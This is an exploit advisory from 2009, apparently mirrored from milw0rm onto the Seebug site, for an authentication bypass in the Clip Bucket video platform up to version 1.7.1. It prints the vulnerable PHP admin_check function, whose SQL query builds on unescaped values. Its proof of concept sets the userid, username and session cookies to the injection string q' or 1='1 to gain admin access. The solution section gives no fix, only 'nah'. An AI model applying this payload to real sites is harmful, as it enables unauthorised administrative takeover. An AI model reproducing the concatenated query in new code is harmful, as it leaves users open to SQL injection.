|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` =Vuln: Clip Bucket <= 1.7.1 Insecure Cookie Handling =INFO: http://clip-bucket.com/ =BUY: --- =Download: http://clip-bucket.com/download =DORK: :) ____________ _-=/:Conditions:\=-_ ```````````````````````````````````````````````````````````````````````````````` Magic_quotes MUST BE OFF ---------------------------------------===-------------------------------------- _________________ _-=/:Vulnerable_Code:\=-_ ```````````````````````````````````````````````````````````````````````````````` // in "\includes\classes\user.class.php" function admin_check(){ $admin = 'Admin'; if(isset($_COOKIE['userid']) && isset($_COOKIE['username']) && isset($_COOKIE['session'])) { $userid = @$_SESSION['userid']; $username = @$_SESSION['username']; $session = @$_COOKIE['PHPSESSID']; $query = mysql_query("SELECT * FROM users WHERE level='".$admin."' AND username ='".$username."' AND userid = '".$userid."' AND session='".$session."'"); if(mysql_num_rows($query)>0){ $answer = 1; return $answer; }else{ $answer = 0; return $answer; } } } ---------------------------------------===-------------------------------------- _______ _-=/:P.o.C:\=-_ ```````````````````````````````````````````````````````````````````````````````` Set Cookies: userid=q' or 1='1 username=q' or 1='1 session=q' or 1='1 ---------------------------------------===-------------------------------------- __________ _-=/:SOLUTION:\=-_ ```````````````````````````````````````````````````````````````````````````````` nah ---------------------------------------===-------------------------------------- ______________________________________________________________________________ / \ | ---------------------------------------------------------------------- | \______________________________________________________________________________/ \ No More Private / ````````````````` Salamz to All Muslim Hackers. # milw0rm.com [2009-07-24]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论